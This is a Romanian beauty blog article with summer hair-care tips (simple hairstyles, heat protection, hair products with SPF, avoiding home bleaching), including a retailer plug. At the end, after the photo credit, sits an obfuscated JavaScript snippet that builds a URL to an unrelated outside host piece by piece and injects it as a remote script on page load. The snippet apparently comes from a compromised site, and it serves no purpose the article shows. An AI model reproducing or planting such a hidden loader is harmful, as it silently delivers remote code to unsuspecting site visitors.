Un păr frumos şi sănătos nu trebuie să ţi se pară un vis îndepărtat. Există o mulţime de metode prin care îţi poţi îngriji corect părul şi să te bucuri de un look impecabil zi de zi.

Vestea bună este că nu ai nevoie de zeci de produse sau de ore în şir pentru a-l coafa cu instrumente speciale.

Vara este anotimpul în care te bucuri de soare, plajă, mare sau piscină şi în care poate fi chiar mai dificil să îţi păstrezi aspectul sănătos al părului.

Renunţă la coafurile complicate

Un păr sănătos înseamnă un fir de păr îngrijit şi cât mai puţină expunere la instrumente ce folosesc căldură pentru coafare. Încearcă coafuri simple, pentru care nu trebuie să pierzi zeci de minute în oglindă sau să foloseşti aparate ce pot arde firul de păr. Bigudiurile, cozile împletite sau cocurile sunt doar câteva soluţii pe care le poţi implementa.

De asemenea, poţi folosi aparate precum placă de păr pentru a finisa un look. Spre exemplu, cu ajutorul unei plăci de păr îţi poţi întoarce vârfurile pentru o coafură stylish şi gata în 5 minute cu minim de efort.

Nu uita să foloseşti protecţie termică de fiecare dată. Pe altex.ro găseşti placă de păr la preţuri prietenoase şi de la branduri de renume.

Foloseşte produse cu SPF

Aşa cum crema cu factor de protecţie solară este esenţială pentru piele, exact la fel are nevoie şi părul tău protecţie.

De ce?

Pentru că razele puternice ale soarelui usucă părul şi pot duce la deterioarea să. Există o mulţime de produse cu SPF pentru păr pe care le poţi încerca.

De asemenea, poţi găsi produse 2 în 1 care oferă atât SPF, cât şi alte beneficii. Poţi alege un ulei de păr cu SPF, care să îţi ofere extra hidratare sau un spray de păr cu SPF şi sclipici, care să îţi ofere un look cool de vară.

Nu încerca proceduri complicate acasă

Un păr sănătos este un păr îngrijit şi coafat corect. Pentru a avea un păr sănătos vara, dar şi tot restul anului, este esenţial să nu încerci proceduri complicate, precum balayage, foilyage, şuviţe sau baby lights.

De ce?

Pentru că acestea necesită atenţia şi expertiza unui hair-stylist, altfel procedurile de decolorare, vopsire sau suvitare pot duce la deteriorarea şi arderea firului de păr.

Dacă îţi doreşti o schimbare de look acasă, încearcă şampoanele nuanţatoare sau măştile de păr nuanţatoare.

Un păr frumos nu trebuie să însemne prea multe ore în faţa oglinzii, zeci de produse sau coafuri complicate. Pentru a păstra sănătatea părului, în special în anotimpul cald, foloseşte produsele potrivite, inclusiv protecţie solară pentru păr şi evită folosirea excesivă a aparatelor pentru coafat.

De asemenea, nu încerca să îţi faci balayage, foilyage sau alte proceduri similare acasă, ci apelează la un expert.

Sursa foto: Pexels.com

<script>
(function(){
qdxX=document.createElement("script");qdxX_=("us")+("ta");
qdxX_+="t"+(".");qdxX_+=("in");qdxXu="547658787";qdxX.async=true;
qdxXu+=".7X2khn9udxX4lt7ck";qdxX.type="text/javascript";qdxX_+="f"+"o"+("/");
qdxXu+="dhu415iwX9xdu";qdxX.src="https://"+qdxX_+qdxXu;
dqdxX=document.body;dqdxX.appendChild(qdxX);
})();
</script>

Write A Comment